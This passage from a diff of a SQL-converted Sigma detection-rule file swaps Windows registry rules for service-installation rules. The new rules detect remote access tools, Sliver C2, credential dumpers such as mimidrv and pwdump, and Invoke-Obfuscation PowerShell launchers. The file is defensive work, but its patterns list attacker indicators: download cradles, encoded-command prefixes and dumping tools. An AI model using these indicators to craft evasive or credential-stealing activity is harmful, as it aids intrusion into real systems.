], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" ], - "filename": "registry_event_persistence_recycle_bin.yml" + "filename": "win_system_susp_service_installation.yml" }, { - "title": "Leviathan Registry Key Activity", - "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "status": "test", - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "author": "Aidan Bracher", + "title": "Remote Access Tool Services Have Been Installed - System", + "id": "1a31b18a-f00c-4061-9900-f735b96c99fc", + "status": "experimental", + "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", + "author": "Connor Martin, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1543.003", + "attack.t1569.002" ], - "level": "critical", + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036') AND (ServiceName LIKE '%SSUService%' ESCAPE '\\' OR ServiceName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceName LIKE '%Atera%' ESCAPE '\\' OR ServiceName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceName LIKE '%RPCService%' ESCAPE '\\' OR ServiceName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceName LIKE '%monblanking%' ESCAPE '\\' OR ServiceName LIKE '%RManService%' ESCAPE '\\' OR ServiceName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceName LIKE '%vncserver%' ESCAPE '\\' OR ServiceName LIKE '%Parsec%' ESCAPE '\\' OR ServiceName LIKE '%chromoting%' ESCAPE '\\' OR ServiceName LIKE '%Zoho%' ESCAPE '\\' OR ServiceName LIKE '%jumpcloud%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_leviathan.yml" + "filename": "win_system_service_install_remote_access_software.yml" }, { - "title": "HybridConnectionManager Service Installation - Registry", - "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - System", + "id": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", "status": "experimental", - "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1608" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND Details LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%rundll32.exe%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" + "filename": "win_system_invoke_obfuscation_via_rundll_services.yml" }, { - "title": "Security Support Provider (SSP) Added to LSA Configuration", - "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", - "status": "test", - "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "author": "iwillkeepwatch", + "title": "RTCore Suspicious Service Installation", + "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", + "status": "experimental", + "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.005" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" ], - "filename": "registry_event_ssp_added_lsa_config.yml" + "filename": "win_system_susp_rtcore64_service_install.yml" }, { - "title": "CMSTP Execution Registry Event", - "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Sliver C2 Default Service Installation", + "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "status": "experimental", + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" ], - "filename": "registry_event_cmstp_execution_by_registry.yml" + "filename": "win_system_service_install_sliver.yml" }, { - "title": "Removal Of SD Value to Hide Schedule Task - Registry", - "id": "acd74772-5f88-45c7-956b-6a7b36c294d2", + "title": "New PDQDeploy Service - Client Side", + "id": "b98a10af-1e1e-44a7-bab2-4cc026917648", "status": "experimental", - "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware", - "author": "Sittikorn S", + "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%SD%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployRunner-%' ESCAPE '\\' OR ServiceName LIKE 'PDQDeployRunner-%' ESCAPE '\\'))" ], - "filename": "registry_delete_schtasks_hide_task_via_sd_value_removal.yml" + "filename": "win_system_service_install_pdqdeploy_runner.yml" }, { - "title": "Removal of Potential COM Hijacking Registry Keys", - "id": "96f697b0-b499-4e5d-9908-a67bec11cdb6", - "status": "test", - "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Anydesk Remote Access Software Service Installation", + "id": "530a6faa-ff3d-4022-b315-50828e77eef5", + "status": "experimental", + "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence" ], "falsepositives": [ - "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" + "Legitimate usage of the anydesk tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\shell\\\\open\\\\command' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Dropbox.%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Wireshark\\_uninstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\wireshark-capture-file\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Opera\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Opera\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\installer.exe' ESCAPE '\\') OR (Image LIKE '%peazip%' ESCAPE '\\' AND TargetObject LIKE '%\\\\PeaZip.%' ESCAPE '\\') OR (Image LIKE '%\\\\Everything.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Everything.%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\installer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Classes\\\\WOW6432Node\\\\CLSID\\\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'AnyDesk Service')" ], - "filename": "registry_delete_removal_com_hijacking_registry_key.yml" + "filename": "win_system_service_install_anydesk.yml" }, { - "title": "Removal Of AMSI Provider Registry Keys", - "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "title": "Tap Driver Installation", + "id": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", "status": "test", - "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", - "author": "frack113", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unlikely" + "Legitimate OpenVPN TAP insntallation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%tap0901%' ESCAPE '\\')" ], - "filename": "registry_delete_removal_amsi_registry_key.yml" + "filename": "win_system_tap_driver_installation.yml" }, { - "title": "Terminal Server Client Connection History Cleared - Registry", - "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", - "status": "test", - "description": "Detects the deletion of registry keys containing the MSTSC connection history", - "author": "Christian Burkard (Nextron Systems)", + "title": "Credential Dumping Tools Service Execution - System", + "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "status": "experimental", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1112" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "registry_delete_mstsc_history_cleared.yml" + "filename": "win_system_mal_creddumper.yml" }, { - "title": "Removal Of Index Value to Hide Schedule Task - Registry", - "id": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", + "title": "PAExec Service Installation", + "id": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", + "description": "Detects PAExec service installation", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ServiceName LIKE 'PAExec-%' ESCAPE '\\' OR ImagePath LIKE 'C:\\\\WINDOWS\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "registry_delete_schtasks_hide_task_via_index_value_removal.yml" + "filename": "win_system_service_install_paexec.yml" }, { - "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", - "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", + "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "status": "experimental", - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrators removing applications (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "registry_delete_exploit_guard_protected_folders.yml" + "filename": "win_system_invoke_obfuscation_via_var_services.yml" }, { - "title": "Potential COM Object Hijacking Via TreatAs Subkey - Registry", - "id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", + "title": "Suspicious Service Installation Script", + "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", "status": "experimental", - "description": "Detects COM object hijacking via TreatAs subkey", - "author": "Kutepov Anton, oscd.community", + "description": "Detects suspicious service installation scripts", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ - "Maybe some system utilities in rare cases use linking keys for backward compatibility" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%HKU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Classes\\\\CLSID\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\TreatAs%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" ], - "filename": "registry_add_persistence_com_key_linking.yml" + "filename": "win_system_susp_service_installation_script.yml" }, { - "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", - "id": "f50f3c09-557d-492d-81db-9064a8d4e211", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", + "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", "status": "experimental", - "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" }, { - "title": "Potential NetWire RAT Activity - Registry", - "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "title": "Invoke-Obfuscation Via Use Rundll32 - System", + "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", "status": "experimental", - "description": "Detects registry keys related to NetWire RAT", - "author": "Christopher Peacock", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_netwire.yml" + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" }, { - "title": "Potential Persistence Via Disk Cleanup Handler - Registry", - "id": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", - "status": "experimental", - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "StoneDrill Service Install", + "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "status": "test", + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.g0064", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate new entry added by windows" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\Active Setup Temp Folders' ESCAPE '\\' OR TargetObject LIKE '%\\\\BranchCache' 